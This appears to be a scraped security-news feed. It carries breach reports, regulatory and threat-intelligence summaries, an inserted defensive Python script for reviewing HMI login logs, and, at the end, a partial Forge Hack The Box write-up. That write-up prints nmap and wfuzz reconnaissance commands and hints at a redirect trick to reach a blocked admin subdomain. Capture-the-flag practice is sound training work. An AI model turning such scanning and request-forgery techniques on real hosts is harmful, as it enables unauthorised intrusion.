Explore the integration of Large Language Models (LLMs) in critical systems and the balance between security and usability with a new LLM benchmarking framework. The post Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework appeared first on NetSPI.

by NetSPI

New York Releases AI Cybersecurity Guidance: What You Need to Know

Ilona Cohen, Mon, 12/16/2024 - 10:33

AI adoption is accelerating in the financial services industry, both as an asset for improving business operations and as a potential tool to defend against cybercriminals. At the same time, adopting AI systems expands the attack surface that financial institutions must protect. Within this context, the NYDFS guidelines highlight the need for proactive risk management strategies that encompass the unique challenges posed by AI technologies.

Cybersecurity Risks of AI

The NYDFS guidance outlines several key cybersecurity risks associated with AI, along with strategies for mitigating those risks:

- AI-Enabled Social Engineering: One of the most immediate concerns is AI's potential to enhance social engineering attacks. With tools like deepfakes—AI-generated media that can mimic real people—attackers can create highly convincing phishing schemes. These attacks may occur via emails, phone calls (vishing), SMS (smishing), or even video conferencing, where the attacker impersonates trusted employees or executives.
- AI-Enhanced Cybersecurity Attacks: AI allows cybercriminals to amplify the potency, scale, and speed of their attacks. With AI, attackers can quickly scan and analyze vast amounts of data, identify and exploit vulnerabilities, deploy malware, steal sensitive information more efficiently, and develop new malware variants or ransomware designed to evade detection.
- Exposure or Theft of NPI: Financial institutions increasingly rely on AI to process sensitive data, including personally identifiable information (PII) and financial records. This growing reliance heightens the risk of exposure or theft of non-public information (NPI), which is protected under the NYDFS Cybersecurity Regulation.
- Supply Chain Vulnerabilities: As financial organizations integrate AI into their operations, they also depend on a range of third-party vendors and partners. This interconnectedness introduces the risk of cyberattacks targeting vulnerabilities within the supply chain, including AI systems or software that may have been tampered with or compromised.

Mitigating AI Cybersecurity Risks: Key Strategies for Financial Institutions

The NYDFS's guidance offers practical advice on how institutions can address these AI-specific threats and integrate them into their existing cybersecurity programs. Here are key strategies from the guidance:

- Risk Assessments and AI-Specific Programs: Under the NYDFS Cybersecurity Regulation, financial entities are required to perform regular risk assessments. According to NYDFS, these assessments must include AI-related risks. This involves not only evaluating the internal use of AI systems but also assessing the AI systems provided by third-party vendors. Institutions should also ensure that their incident response plans, business continuity plans, and disaster recovery strategies are tailored to handle AI-driven risks.
- Third-Party Service Provider Management: Given the interconnected nature of modern financial systems, managing third-party relationships is more critical than ever. Financial institutions must ensure that their third-party vendors—whether they are providing AI-powered services or supporting infrastructure—adhere to the same stringent cybersecurity standards. Regular assessments and audits should be conducted to ensure third-party systems remain secure.
- Access Controls: The NYDFS guidelines emphasize the importance of robust access control mechanisms, ensuring that only authorized personnel can access sensitive AI-driven systems. This includes implementing multi-factor authentication (MFA), role-based access controls (RBAC), and segmentation of sensitive data to reduce the impact of a potential breach.
- Cybersecurity Training: AI's potential use in social engineering attacks makes cybersecurity awareness training more critical than ever. Institutions should regularly educate their employees about the risks of AI-enhanced attacks and equip them with the knowledge to identify and respond to potential threats. Employees must be trained to recognize the signs of AI-powered phishing attempts and social engineering tactics.
- Continuous Monitoring and Data Management: Financial institutions should implement real-time monitoring tools to detect anomalies and suspicious activities within their AI systems. AI-driven cybersecurity monitoring tools can help track and flag unusual patterns that could signal an ongoing attack or breach. Additionally, effective data management practices should ensure that sensitive data is encrypted, segmented, and protected against unauthorized access.

The Road Ahead: What's Next for AI and Cybersecurity?

The NYDFS's AI cybersecurity guidance underscores the need for financial institutions to proactively incorporate AI considerations into their risk management activities. While the guidelines focus on regulated entities, the risks and strategies outlined are universally relevant to many organizations using AI. As AI technologies become more pervasive, institutions of all sizes must also integrate AI-specific risks into their broader cybersecurity and risk management frameworks.

At HackerOne, we recognize that institutions need more than just traditional cybersecurity measures to address the growing risks posed by AI. That's why we advocate for proactive, real-world testing through AI red-teaming. Red-teaming is a form of adversarial testing that can reveal flaws such as the potential for hackers to bypass AI security protections, as well as algorithmic safeguards against unsafe or harmful output. HackerOne's red-teaming is driven by a community of ethical hackers whose creativity and expertise help organizations around the world stay safer and more secure. By uncovering AI vulnerabilities and algorithmic flaws early, institutions can take steps to mitigate them before they can be exploited by bad actors.

As regulatory requirements around AI and cybersecurity come into focus, institutions should view the NYDFS guidelines not just as best practices but as business compliance imperatives. Securing AI systems is no longer optional; it's essential for protecting both organizational assets and customer trust.

by HackerOne

The more things change, the more they stay the same.

by ThreatDown

Researchers confirmed a new zero-day vulnerability is separate from a flaw originally disclosed in October. A notorious ransomware group linked itself to the attacks.

by Cybersecurity Dive

ITPro Today surveyed 350 DevOps professionals to gain insight into the current state of DevOps practices. The findings reveal how DevOps has reshaped organizations, the obstacles hindering its broader adoption, and the emerging technologies driving future DevOps initiatives.

by ITPro Today

The Security Service of Ukraine (SBU or SSU) has exposed a novel espionage campaign suspected to be orchestrated by Russia's Federal Security Service (FSB) that involves recruiting Ukrainian minors for criminal activities under the guise of "quest games." Law enforcement officials said that it detained two FSB agent groups following a special operation in Kharkiv. These groups, per the agency,

by The Hacker News

In this continuation of our series on building a PowerShell tool to track lost disk space, we’ll focus on adding a feature to identify and display the 10 largest files on the hard disk.

by ITPro Today

New research by Keeper Security has revealed a concerning disconnect between parental trust and the actual cybersecurity practices happening in their children’s schools. While many parents believe schools are protecting their children’s sensitive information, only 14% of schools mandate security awareness training, and a mere 21% provide guidance on secure password management. This gap poses […] The post Schools Need Improved Cyber Education (Urgently) appeared first on IT Security Guru.

by IT Security Guru

Staffers at the Cybersecurity and Infrastructure Security Agency tell WIRED they fear the new administration will cut programs that keep the US safe—and “persecution.”

by WIRED Security News

Digital license plates sold by Reviver, already legal to buy in some states and drive with nationwide, can be hacked by their owners to evade traffic regulations or even law enforcement surveillance.

by WIRED Security News

New research from ISACA has revealed that the majority (87%) of IT professionals agree that there is a lack of gender diversity in the cybersecurity sector, yet less than half (41%) of businesses have programmes in place to hire more women. Whilst troublesome, these stats are not necessarily surprising. What’s more, 74% of businesses noted […] The post Only 41% of Businesses Have Programs in Place to Hire More Women in Tech appeared first on IT Security Guru.

by IT Security Guru

A thwarted attack demonstrates that threat actors are using yet another delivery method for the malware, which already has been spread using phishing emails, malvertising, hijacking of instant messages, and SEO poisoning.

by Dark Reading

The Russian cyber-espionage group Gamaredon has developed two new Android spyware tools, marking their first known venture into mobile malware. The post The first mobile malware families linked to Russia’s Gamaredon appeared first on ZENDATA Cybersecurity.

by Zendata

The updated framework is designed to bolster the government’s partnership with private-sector organizations in the wake of an attack.

by Cybersecurity Dive

Methods to recover access to a hacked Telegram account

by Kaspersky

Kaspersky experts review dark market trends in 2024, such as popularity of cryptors, loaders and crypto drainers on the dark web, and discuss what to expect in 2025.

by Securelist

Telecom Namibia has fallen victim to a cyberattack, resulting in the leak of over 400,000 customer files. The Telecom Namibia cyberattack occurred on December 11, 2024, and the company is working closely with both local and international cybersecurity experts to determine the scope of the breach and to mitigate its impact.

Telecom Namibia's CEO, Stanley Shanapinda, has assured the public that the company is dedicated to addressing the cyberattack responsibly. In a confidential statement, Shanapinda highlighted the company's recent efforts to strengthen its cybersecurity systems.

Overview of the Telecom Namibia Cyberattack

"As cyber incidents have become widespread and a common occurrence, we have recently identified and, in time, successfully contained a cyber reconnaissance mission, thanks to our advanced incident monitoring and detection systems and protocols," he stated. Shanapinda also promised that Telecom Namibia would release a detailed statement regarding the cyberattack soon.

The cyberattack on Telecom Namibia was allegedly carried out by a notorious ransomware group known as Hunters International. This ransomware-as-a-service operation was able to exfiltrate 626.3GB of data, including 492,633 files, before threatening to release the stolen information unless its ransom demands were met, the New Era newspaper reported.

Once the ransom deadline passed, hundreds of sensitive customer records, including personal identification details, addresses, and banking information, were leaked and began circulating on social media.

Concerns over the Cyberattack on Telecom Namibia

The Communications Regulatory Authority of Namibia (Cran) has expressed grave concern over the Telecom Namibia cyberattack. Cran's CEO, Emilia Nghikembua, emphasized the seriousness of cybersecurity in the country. "Through the Namibia Cyber Security Incident Response Team (NAM-CSIRT), Cran promptly responded upon identifying the attack, and continues to support the affected operator in mitigating its impact," Nghikembua said.

Nghikembua also noted that while Namibia currently lacks a dedicated cybercrime and data protection law, the government is committed to ensuring compliance with international best practices in cybersecurity. She encouraged stakeholders to adopt globally recognized security measures such as encryption and regular security assessments to enhance the resilience of the country's critical infrastructure. "The protection of national critical infrastructure requires collective action, strategic planning, and a commitment to compliance with global standards," she added.

Conclusion

The Telecom Namibia cyberattack, with over 400,000 files leaked and sensitive customer data exposed, underscores the urgent need for stronger cybersecurity measures. The leaked information circulating on social media heightens the risk of targeted phishing attacks, where cybercriminals could use the stolen data to exploit individuals further. This is an ongoing story, and The Cyber Express will be closely monitoring the situation. We'll update this post once we have more information about the attack or any new statements from the company.

by The Cyber Express

Rhode Island is tackling a major cybersecurity breach that has compromised the personal information of thousands of residents. The Rhode Island cyberattack targeted the state's online system for delivering health and human services benefits, known as RIBridges, potentially exposing sensitive data such as names, addresses, dates of birth, Social Security numbers, and even banking information. Governor Daniel McKee and his administration are urging residents to take immediate action to protect their personal information as the threat of leaked data looms. Here's what you need to know about the cyberattack, its implications, and the steps being taken to address the situation.

The Rhode Island Cyberattack: What Happened?

On December 5, 2024, Rhode Island's vendor, Deloitte, informed state officials about a potential cyberattack on the RIBridges system. At that time, it was unclear if sensitive information had been breached. Following an internal investigation and the implementation of additional security measures, Deloitte confirmed on December 10 that a breach had occurred. Hackers provided a screenshot of file folders from the system as proof, which likely contained personal data of Rhode Island residents. By December 13, malicious code was detected within the system, leading the state to take RIBridges offline to contain the threat. According to Deloitte, there is a high probability that cybercriminals have accessed files with personally identifiable information (PII). The attackers are demanding a ransom, but state officials have not disclosed the specifics of these demands.

Who Is Affected?

The data breach impacts individuals who have applied for or received benefits through the RIBridges system. Programs managed through this platform include:

- Medicaid
- Supplemental Nutrition Assistance Program (SNAP)
- Temporary Assistance for Needy Families (TANF)
- Child Care Assistance Program (CCAP)
- Rhode Island Works (RIW)
- Long-Term Services and Supports (LTSS)
- Health insurance purchased through HealthSource RI

The state is still determining the full scope of the breach, but it's clear that both current and former beneficiaries could be affected.

What Information Was Compromised?

The stolen data may include:

- Names
- Addresses
- Dates of birth
- Social Security numbers
- Banking information

Deloitte is continuing its analysis to determine the exact extent of the breach.

State Response and Measures Taken

Governor McKee emphasized the urgency of addressing this breach during a media briefing on Friday, December 15. The state has taken the following actions:

- System Shutdown: RIBridges was taken offline on December 13 to mitigate the threat and begin remediation.
- Law Enforcement Involvement: Federal agencies, including law enforcement and the Rhode Island State Police, are assisting with the investigation.
- Dedicated Call Center: Rhode Islanders can contact a toll-free hotline, operated by Experian, for guidance on protecting their personal information. The call center is available Monday through Friday from 9 a.m. to 9 p.m. at 833-918-6603.
- Free Credit Monitoring: Impacted households will receive a letter by mail explaining how to access free credit monitoring services.

What Residents Should Do Now

The state advises Rhode Islanders to take proactive steps to safeguard their personal information:

- Monitor Financial Accounts: Check bank accounts and credit card statements for any unauthorized activity. Contact your bank for guidance on securing your accounts.
- Freeze Your Credit: Consider placing a credit freeze or fraud alert with the three major credit bureaus to prevent unauthorized use of your information. Credit bureau contact information: Equifax 1-800-349-9960, Experian 1-888-397-3742, TransUnion 1-888-909-8872.
- Update Your Passwords: Change any reused or weak passwords to strong, unique ones. Use a password manager to securely store and manage your credentials.
- Stay Alert for Scams: Be cautious of phishing emails or phone calls attempting to exploit this breach. Never provide personal information unless you are certain of the recipient's identity.
- Stay Informed: Visit the state's dedicated website for updates on the situation.

How Is the State Addressing the Breach?

The state and Deloitte are working together to:

- Identify how the breach occurred.
- Remediate vulnerabilities in the system.
- Restore the RIBridges platform as quickly as possible.

Law enforcement continues to investigate the cyberattack, but no further leads have been disclosed at this time.

Key Takeaways for Residents

While no instances of identity theft have been reported so far, residents should remain vigilant. Cybersecurity breaches of this magnitude can have long-term consequences, particularly when sensitive information like Social Security numbers and banking details is involved. Governor McKee and state officials have expressed their commitment to transparency and timely updates. However, the incident underlines the importance of strong cybersecurity measures, especially for systems handling sensitive data.

What's Next?

The state continues to investigate the breach and implement measures to prevent future attacks. Deloitte, as the system vendor, will likely face scrutiny over its cybersecurity protocols and response time. For Rhode Islanders, the immediate focus should be on securing personal information and staying informed about developments in this case.

by The Cyber Express

A list of topics we covered in the week of December 9 to December 15 of 2024

by Malwarebytes Labs

The latest Sensor Intelligence Report from Cyble, dated December 4–10, 2024, sheds light on a troubling increase in cyber threats, including malware intrusions, phishing scams, and attacks targeting vulnerabilities in Internet of Things (IoT) devices. This report, compiled from real-time data captured by Cyble’s extensive network of honeypot sensors, offers critical insights into exploitation attempts, malware, financial fraud, and Common Vulnerabilities and Exposures (CVEs).

Overview of the Cyble Sensor Intelligence Report

Cyble’s Sensor Intelligence Report provides a comprehensive analysis of the most prevalent cyber threats over the past week. Among the key findings, there is a notable surge in exploitation attempts, malware outbreaks, and vulnerabilities within both IoT devices and widely used software platforms. Cyble’s Global Sensors Intelligence (CGSI) network played a crucial role in detecting several attack vectors during this period. These attacks primarily targeted high-profile vulnerabilities such as those found in the Mirai and Gafgyt malware variants, along with exploits affecting the Telerik UI and Cisco ASA platforms. One of the standout observations was the increased frequency of financial fraud attempts, which were often delivered through phishing campaigns designed to steal personal and financial data. These campaigns, many of which were disguised as legitimate software updates or system alerts, continue to present online risks to businesses and individuals alike.

Focus on IoT Vulnerabilities

Among the many attack vectors identified, IoT vulnerabilities emerged as a primary target for cybercriminals. The rapid proliferation of connected devices has created an expansive attack surface, leaving critical systems exposed. In this report, Cyble emphasizes the importance of securing IoT devices against exploitation. A variety of vulnerabilities were identified, many of which allowed attackers to remotely access devices and potentially control them. These vulnerabilities are particularly concerning, as they may compromise entire networks of interconnected systems.

Malware, Phishing, and CVE Exploits

The Sensor Intelligence Report also provides in-depth analysis of the rise of specific malware strains and exploitation attempts targeting software vulnerabilities. Below are the key highlights.

Malware: AppLite Banker Trojan

One of the most interesting threats identified was the AppLite Banker Trojan, a malware designed to steal financial data. This malware is primarily distributed through phishing emails disguised as customer relationship management (CRM) applications. Once installed, it leverages Android’s Accessibility Services to overlay fake login screens on popular banking apps, tricking users into entering their credentials. What makes AppLite particularly dangerous is its advanced evasion techniques. It manipulates APK file structures, making it difficult for static analysis tools to detect it. After gaining access to a device, the Trojan can exfiltrate sensitive financial data, execute commands remotely, and control the device through features like screen unlocking and simulating user interactions. With its multilingual capabilities, this malware is becoming a global threat, targeting users across various regions.

CVE Exploits: A Growing Concern

Cyble’s Sensor Intelligence Report also highlights the continued exploitation of numerous CVEs, with CVE-2020-11899 standing out as the most frequently attacked. This vulnerability, which affects the Treck TCP/IP stack, allows attackers to trigger an out-of-bounds read in IPv6 communications. During the reporting period, a staggering 25,736 attempts to exploit this vulnerability were detected. Other notable CVEs under attack include:
- CVE-2019-0708: A remote code execution vulnerability in Remote Desktop Services that continues to be actively targeted.
- CVE-2021-44228: The infamous Log4j vulnerability, which remains a major avenue for cybercriminal exploitation.

These CVEs, along with many others, have been exploited in increasingly sophisticated attacks, demonstrating the critical need for organizations to patch vulnerabilities in a timely manner.

Case Studies on Exploited Vulnerabilities

The report also examines several vulnerabilities in widely used software systems. Key examples include:
- PHP CGI Argument Injection Vulnerability (CVE-2024-4577): This critical vulnerability in PHP configurations allows attackers to execute arbitrary commands via specially crafted URL parameters. Organizations are advised to patch PHP configurations and limit access to prevent exploitation.
- OSGeo GeoServer Remote Code Execution (CVE-2024-36401): Cyble identified a remote code execution flaw in older versions of GeoServer, which allows unauthenticated users to run arbitrary code. The report recommends updating GeoServer to versions 2.23.6, 2.24.4, or 2.25.2 to mitigate the risk.
- Ruby SAML Improper Signature Verification (CVE-2024-45409): This vulnerability in the Ruby-SAML library could allow attackers to forge SAML responses and gain unauthorized access to systems. Updating to Ruby-SAML version 1.17.0 is recommended.
- Cisco IOS XE Web UI Privilege Escalation (CVE-2023-20198, CVE-2023-20273): Exploitation of these vulnerabilities allows attackers to escalate privileges and gain root access to affected systems, with active attacks continuing.

Conclusion

To mitigate the growing cyber threats identified in Cyble’s Sensor Intelligence Report, organizations must adopt a proactive approach: regularly update software and hardware to patch vulnerabilities, leverage threat intelligence feeds to block malicious IPs, enforce strong passwords and multi-factor authentication, and continuously monitor for Indicators of Compromise (IoCs) such as suspicious IP addresses and file hashes. Regular vulnerability audits should also be conducted to identify and remediate misconfigurations.

by The Cyber Express

by ComputerWeekly

For the latest discoveries in cyber research for the week of 16th December, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The Romanian National Cybersecurity Directorate (DNSC) has disclosed a ransomware attack conducted by Lynx ransomware gang on the country’s energy provider Electrica Group, which provides services to more than 3.8M people across […] The post 16th December – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

The Cybersecurity and Infrastructure Security Agency (CISA) and the Environmental Protection Agency (EPA) have jointly released a crucial fact sheet highlighting the cybersecurity risks posed by Internet-exposed Human Machine Interfaces (HMIs) in the Water and Wastewater Systems (WWS) sector. The fact sheet, titled Internet-Exposed HMIs Pose Cybersecurity Risks to Water and Wastewater Systems, offers practical guidance for WWS facilities to mitigate the risks associated with unsecured HMIs and protect their operations from malicious cyber activity.

HMIs are integral to the operation of supervisory control and data acquisition (SCADA) systems, which are commonly used in Water and Wastewater Systems (WWS) to monitor and control a wide array of infrastructure. These systems are often connected to programmable logic controllers (PLCs), which manage real-time operations. However, when HMIs are exposed to the internet without proper security measures, they become vulnerable to exploitation by cybercriminals and other threat actors.

The Dangers of Exposed Human Machine Interfaces in WWS

Human Machine Interfaces serve as the critical bridge between operational technology (OT) and system operators, allowing them to monitor and control various aspects of WWS operations. However, when HMIs are exposed to the internet, they can be accessed by unauthorized users, putting vital water and wastewater operations at risk. According to the joint fact sheet, unauthorized access to exposed HMIs allows malicious actors to:
- View sensitive information, including graphical user interfaces, distribution system maps, event logs, and security settings.
- Make unauthorized modifications, potentially disrupting water and wastewater treatment processes, which can lead to severe operational impacts.

One distressing trend that has emerged in recent years is the ability of threat actors to easily identify and exploit internet-exposed HMIs with weak or no cybersecurity defenses. In 2024, pro-Russia hacktivists exploited vulnerabilities in exposed HMIs at multiple Water and Wastewater Systems facilities. These attackers manipulated system settings to push water pumps and blower equipment beyond their safe operating limits, altered critical settings, deactivated alarm mechanisms, and locked out system operators by changing administrative passwords. The result was a forced reversion to manual operations, disrupting services.

Mitigation Strategies for Securing HMIs

In response to these growing concerns, CISA and EPA have outlined several mitigations that WWS organizations should implement to enhance the security of their Human Machine Interfaces and protect against cyber threats. These recommendations are vital to hardening remote access to HMIs and ensuring that only authorized personnel can interact with these systems.
- Identify all HMIs and related systems that are accessible from the public internet. This allows for a comprehensive understanding of the vulnerabilities within the system.
- If possible, disconnect any internet-facing HMIs from the public network. If disconnection is not feasible, it is essential to secure them with strong access controls, including complex usernames and passwords.
- Implement multifactor authentication for all remote access to HMIs and OT networks, adding an extra layer of security to the system.
- Enable a demilitarized zone (DMZ) or bastion host at the OT network boundary to isolate sensitive systems from the broader internet, making it harder for unauthorized actors to penetrate internal networks.
- Keep systems and software up to date with the latest security patches, which is essential for closing vulnerabilities that could be exploited by cybercriminals.
- Only allow authorized IP addresses to access the HMIs, reducing the risk of unauthorized remote login attempts.
- Log and review all remote logins to HMIs, paying attention to any failed login attempts or unusual login times, which could indicate suspicious activity.

Conclusion

CISA and the EPA offer valuable resources to help Water and Wastewater Systems (WWS) strengthen cybersecurity, including free vulnerability scanning and guidance such as CISA’s Top Cyber Actions for Securing Water Systems and the EPA’s cybersecurity recommendations. Tools like CISA’s Stuff Off Search help identify internet-exposed assets. As cyber threats increase, WWS must adopt strong security measures, such as access controls, multifactor authentication, and regular updates, to protect critical infrastructure and ensure the safety of water and wastewater services.

by The Cyber Express
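The last two mitigations in the CISA/EPA list (restrict HMI access to authorized source addresses; log and review remote logins for failures and unusual login times) are easy to turn into a routine review. The script below is an added example, not part of the fact sheet or the article: it assumes a constructed log format of "date time user source_ip result" lines, an operator-maintained allow-list of source networks, and a normal operating window of 06:00 to 22:00, all of which are placeholders to be replaced with a site's real values.

```python
"""Review HMI remote-login records against an allow-list and an operating window.

Added example (not from the CISA/EPA fact sheet). All values below are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, time
from ipaddress import ip_address, ip_network

# Constructed allow-list: the operations LAN and one named jump host.
ALLOWED_SOURCES = [ip_network("10.20.0.0/24"), ip_network("192.168.50.10/32")]
# Constructed operating window; logins outside it are unusual for this site.
BUSINESS_HOURS = (time(6, 0), time(22, 0))
# A success preceded by this many failures from the same user/source is flagged.
FAILURE_THRESHOLD = 3

# Constructed sample log: "date time user source_ip result" per line.
SAMPLE_LOG = """\
2024-12-14 08:02:11 operator1 10.20.0.15 success
2024-12-14 08:40:53 operator2 10.20.0.22 success
2024-12-14 23:17:04 admin 203.0.113.44 failure
2024-12-14 23:17:09 admin 203.0.113.44 failure
2024-12-14 23:17:15 admin 203.0.113.44 failure
2024-12-14 23:17:31 admin 203.0.113.44 success
2024-12-15 03:05:40 operator1 10.20.0.15 success
"""


@dataclass
class LoginEvent:
    ts: datetime
    user: str
    source: str
    success: bool


def parse_log(text: str) -> list:
    """Parse the constructed log format; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, clock, user, src, result = line.split()
        ts = datetime.fromisoformat(f"{date} {clock}")
        events.append(LoginEvent(ts, user, src, result == "success"))
    return events


def is_allowed_source(addr: str) -> bool:
    """True when the source address falls inside any allow-listed network."""
    ip = ip_address(addr)
    return any(ip in net for net in ALLOWED_SOURCES)


def outside_hours(ts: datetime) -> bool:
    """True when the login time falls outside the operating window."""
    start, end = BUSINESS_HOURS
    return not (start <= ts.time() < end)


def review(events: list) -> list:
    """Return (reason, event) findings in time order.

    Tracks consecutive failures per (user, source) so a success that follows a
    burst of failures is reported as a possible guessed or reset credential.
    """
    findings = []
    failures = {}
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.user, ev.source)
        if not is_allowed_source(ev.source):
            findings.append(("source not on allow-list", ev))
        if outside_hours(ev.ts):
            findings.append(("login outside operating hours", ev))
        if ev.success:
            if failures.get(key, 0) >= FAILURE_THRESHOLD:
                findings.append((f"success after {failures[key]} failures", ev))
            failures[key] = 0
        else:
            failures[key] = failures.get(key, 0) + 1
    return findings


def summarize(text: str) -> list:
    """Flatten findings to (reason, user, source, timestamp) tuples for reporting."""
    return [(reason, ev.user, ev.source, ev.ts.isoformat(sep=" "))
            for reason, ev in review(parse_log(text))]


if __name__ == "__main__":
    for finding in summarize(SAMPLE_LOG):
        print(*finding)
```

On the constructed sample, the 203.0.113.44 session is flagged three ways (unknown source, after hours, and a success following three failures), and the 03:05 login from an allowed address is flagged only for its time; the operator decides which of those warrants a call to the site.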

Amnesty said it found NoviSpy, an Android spyware linked to Serbian intelligence, on the phones of several members of Serbian civil society following police stops. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

A fraudulent Google ad meant to phish employees for their login credentials redirects them to a fake browser update page instead.

by Malwarebytes Labs

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2024-47484.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-47977.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Dell Avamar. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.1. The following CVEs are assigned: CVE-2024-52538.

by Zero Day Initiative Advisories

The security system that underlies the internet makes use of a curious fact: You can broadcast part of your encryption to make your information much more secure.

by WIRED Security News

State officials said hundreds of thousands of Rhode Island residents could be affected by a cyberattack on the state’s online portal for social services, with a “high probability” that personally identifiable information was breached. According to an update from Governor Dan McKee’s office, the attack targeted RIBridges, which Rhode Island residents use to apply for and […]

by TechCrunch

Germany's Federal Office of Information Security (BSI) has announced that it has disrupted a malware operation called BADBOX that came preloaded on at least 30,000 internet-connected devices sold across the country. In a statement published earlier this week, authorities said they severed the communications between the devices and their command-and-control (C2) servers by sinkholing the domains

by The Hacker News

Thai government officials have emerged as the target of a new campaign that leverages a technique called DLL side-loading to deliver a previously undocumented backdoor dubbed Yokai. "The target of the threat actors were Thailand officials based on the nature of the lures," Nikhil Hegde, senior engineer for Netskope's Security Efficacy team, told The Hacker News. "The Yokai backdoor itself is not

by The Hacker News

Bitdefender bundles antivirus and anti-malware with other digital privacy tools to keep you safer. Here's how it works.

by ZDNET Security

Plus: The US indicts North Koreans in fake IT worker scheme, file-sharing firm Cleo warns customers to patch a vulnerability amid live attacks, and more.

by WIRED Security News

As digital nomadism gains traction, businesses must adapt by leveraging web intelligence to meet the evolving needs of remote workers.

by ITPro Today

A now-removed GitHub repository that advertised a WordPress tool to publish posts to the online content management system (CMS) is estimated to have enabled the exfiltration of over 390,000 credentials. The malicious activity is part of a broader attack campaign undertaken by a threat actor, dubbed MUT-1244 (where MUT refers to "mysterious unattributed threat") by Datadog Security Labs, that

by The Hacker News

Analysis of packer-as-a-service (PaaS) HeartCrypt reveals its use in over 2k malicious payloads across 45 malware families since its early 2024 appearance. The post Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation appeared first on Unit 42.

by Palo Alto Networks - Unit42

A security flaw has been disclosed in OpenWrt's Attended Sysupgrade (ASU) feature that, if successfully exploited, could have been abused to distribute malicious firmware packages. The vulnerability, tracked as CVE-2024-54143, carries a CVSS score of 9.3 out of a maximum of 10, indicating critical severity. Flatt Security researcher RyotaK has been credited with discovering and reporting the

by The Hacker News

Defenders running the Cleo managed file transfer are urged to be on the lookout for the Cleopatra backdoor and other indicators of an ongoing ransomware campaign, as patching details remain foggy, and no CVE has been issued.

by Dark Reading

Businesses deploying large language models and other GenAI systems have a growing collection of open source tools for testing AI security.

by Dark Reading

A new side-channel attack method is a computationally practical way to infer the structure of a convolutional neural network — meaning that cyberattackers or rival companies can plagiarize AI models and take their data for themselves.

by Dark Reading

The U.S. Department of Justice (DoJ) has indicted 14 nationals belonging to the Democratic People's Republic of Korea (DPRK or North Korea) for their alleged involvement in a long-running conspiracy to violate sanctions and commit wire fraud, money laundering, and identity theft by illegally seeking employment in U.S. companies and non-profit organizations. "The conspirators, who worked for

by The Hacker News

Open to players of all skill levels, the "Snow-mageddon" cybersecurity competition takes place in the world of Santa, elves, and Christmas mayhem.

by Dark Reading

Optum's AI chatbot was found exposed online at a time when the healthcare giant faces scrutiny for its use of AI to allegedly deny patient claims.

by TechCrunch

In an effort to continue the positive trend of the healthcare industry not experiencing the highest number of breaches in Q1 of 2024, the US Department of Health and Human Services (HHS) launched a new initiative last spring. Learn more about the new federal program in this blog.

by Barracuda

A flurry of drone sightings across New Jersey and New York has sparked national intrigue and US government responses. But experts are pouring cold water on America’s hottest new conspiracy theory.

by WIRED Security News

Infostealer capabilities and how to protect your organization against this threat.

by Kaspersky

IoT security assessments expose diverse technologies, use cases, and protocols. While wireless components like WiFi and Bluetooth enhance functionality and enable features like OTA updates, they also increase the attack surface. This blog explores the challenges of assessing non-wireless IoT devices and considers the potential of adding wireless capabilities for comprehensive security testing. The post Breaking the Air Gap Through Hardware Implants appeared first on Praetorian.

by Praetorian

2024-12-13 18:09:25

Forge HTB Writeup

Task 1: How many open TCP ports are listening on Forge?

└──╼ [★]$ nmap --min-rate 10000 -A -p- forge.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 04:03 CST
Nmap scan report for forge.htb (10.129.53.139)
Host is up (0.28s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Gallery

Answer: 2

Task 2: What TCP port is reported as filtered by nmap?

From the previous task we can see that port 21 is filtered.

Answer: 21

Task 3: What is the full domain name of the subdomain of the default domain used by the website?

For this task we need to fuzz or enumerate to find subdomains. We will be using the following command to do that. Filtering out all responses of 404, 403 and 302, we get our answer.

└──╼ [★]$ wfuzz -u http://forge.htb -H "Host: FUZZ.forge.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 404,403,302
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://forge.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000024:   200        1 L      4 W        27 Ch       "admin"

Answer: admin.forge.htb

Make sure to add this subdomain to the /etc/hosts file.

Task 4: In addition to HTTP, what other protocol is supported in the URLs provided to the “upload from url” form?

This one should be obvious: we check the web page, and the answer field shows five stars (*****).

Answer: https

Task 5: What is the text in the <center><h1> tags on the admin site?

Hint: Trying to access admin.forge.htb directly or from the URL field is blocked. What happens if we have the URL contact us and then we return an HTTP 302?

